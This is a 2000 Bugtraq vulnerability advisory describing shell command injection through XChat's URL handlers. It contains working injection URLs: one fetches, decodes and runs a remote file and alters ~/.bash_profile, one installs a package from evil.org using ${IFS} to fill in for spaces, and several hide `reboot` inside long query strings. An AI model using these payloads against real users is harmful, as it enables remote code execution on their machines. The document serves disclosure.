[16282] in bugtraq


XChat URL handler vulnerability

daemon@ATHENA.MIT.EDU (zenith parsec)
Fri Aug 18 01:51:51 2000

Message-Id:  <20000817111940.2344.qmail@fiver.freemessage.com>
Date:         Thu, 17 Aug 2000 11:19:40 -0000
Reply-To: zenith parsec <zenith_parsec@THE-ASTRONAUT.COM>
From: zenith parsec <zenith_parsec@THE-ASTRONAUT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM


**********************************************************************
Email was sent to zed@linux.com (the author of xchat) and after over a week,
I have received no reply. So here it is... the advisory.
**********************************************************************

***************
***zen-parse*** - blinking since 1992 (or mebe earlier)
***************

X   X   CC   H  H   AA   TTTTT
 X X   C  C  H  H  A  A    T
  X    C     HHHH  AAAA    T
 X X   C  C  H  H  A  A    T
X   X   CC   H  H  A  A    T

Hole:    backticked commands embedded in URLs vulnerability.

***********************************
* If you are lazy, read this part *
***********************************

Just to show what I mean about the possible danger, start Netscape and enter
the following URL in xchat (in a channel or query window).

http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`'

Right click on it, and select the Netscape (Existing) or Netscape (New Window)
option.

Wait until the URL loads.
In a shell on your machine type

tail -2 ~/.bash_profile

echo You've been hax0red
echo --zen 

(oops... it should have been You\'ve been hax0red, but you get the idea ;])
Lucky it wasn't a well-written script, designed to use script-kiddie
stuff to hack root or something, eh?
**********************************************************************
**********************************************************************

For the non-lazy and the lazy who were impressed by the quick demo...

<advisory>
**********************************************************************
 X-Chat's URL handlers allow remote execution of commands with the
 permissions of the user running it. (Affects at least versions < 1.4.2,
 probably all versions.)
**********************************************************************

The hole is in the URL Handler section. Each handler is a command template
in which %s is replaced by the selected URL, and the resulting string is
handed to the shell to run. For example:
    Netscape (Existing)
causes XChat to run the command
    netscape -remote 'openURL(%s)'
where the %s is replaced by the selected URL,
e.g. http://homepages.ihug.co.nz/~Sneuro/
causes the command
    netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)'
which opens that page.
    Netscape (Run New)
causes XChat to run the command
    netscape %s
and so on.

**************************
*       The Hole         *
**************************

Backticks and shell expansion. Imagine if someone types:

l00k @ d15 k3w1 w@r3z  5173! http://www.altavista.com/?x=`date`y='`date`'


With the (Existing) or (New Window) options, and any others that
use 'openURL(%s)'-style commands to start the program, you get:

    netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'

Count the single quotes: the ' in the URL closes the quote the handler
opened, so the 2nd `date` is no longer quoted and the shell runs it; the
final ' in the URL reopens the quote so the rest of the command still
parses. (The 1st `date` stays inside the quotes and is passed literally.)

With the (Run New) type commands (that is, command %s, with no 's around
the %s) you get:

    netscape http://www.altavista.com/?x=`date`y='`date`'

which has the 1st `date` unquoted (no 's around it), so that one executes
instead.

In real life, though, it's unlikely anyone would click on a URL like

http://`reboot`/'`reboot`'

Still not all that useful, I hear you say. Well, URLs can get pretty long.
For example, a cgi-bin call to something can get quite long:

http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10

compare that to:

http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1

At a quick glance, nothing looks wrong with it.

There seems to be a limitation, in that putting spaces in a URL doesn't
work, nor does redirection.

But you can get spaces: the $IFS variable is (almost certainly) set, and
it expands to whitespace. And who needs redirection when you can do this:

http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'

(for (Existing) or (New Window))

http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"

(for (Run New))
(Not hidden in any way, but it could be obfuscated like the earlier example.)
(Also, rpm -i only works if someone is running X-Chat as root, which is a
*STUPID* idea anyway, but the 1st example should have shown you a way
around that.)

anyway... the possibilities are endless ;)

-- zen-parse
</advisory>

ps:
greets to:
lamagra, omega, lockdown, grue,  Mega, possem, 
some other people i can't remember, the rest of #roothat, 
and mebe even #social and umm... u, if I know u.



